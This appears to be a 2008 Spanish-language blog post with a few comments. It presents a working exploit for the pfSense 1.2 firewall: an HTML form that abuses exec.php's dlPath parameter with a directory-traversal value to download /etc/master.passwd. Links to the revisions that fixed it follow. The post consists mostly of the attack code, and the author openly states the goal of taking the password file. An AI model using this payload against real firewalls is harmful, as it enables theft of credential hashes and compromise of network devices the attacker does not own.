jueves, 7 de agosto de 2008

Bug and exploit for Pfsense v1.2

Por donde atacarias un firewall?


Un exploit?
bash-3.2# cat ataque.html

<form name="ataque" method="post" action="http://192.168.20.200/exec.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Ataque</td>
<td><input name="submit" type="text" id="victima" value="Download"></td>
<td><input name="dlPath" type="text" id="victima2" value="../../../../../../../etc/master.passwd"></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="submit" value="Download"></td>
</tr>
</table>
</form>
Donde, 192.168.20.200 es ?

Yo solo quiero descargarme el /etc/master.passwd del firewall.
(thx astrid por la inspiración, jeje)
Un fix silencioso ...

de:
http://cvstrac.pfsense.org/fileview?f=pfSense/usr/local/www/exec.php&v=1.10.4.11.2.1

a:

http://cvstrac.pfsense.org/fileview?f=pfSense/usr/local/www/exec.php&v=1.10.4.13


bye ...

3 comentarios:

Astrid dijo...

:)
Another masterpiece :*

Anónimo dijo...

nice nice very nice ...

Claudia Peña dijo...

master of your inspiration?

:P

Entradas populares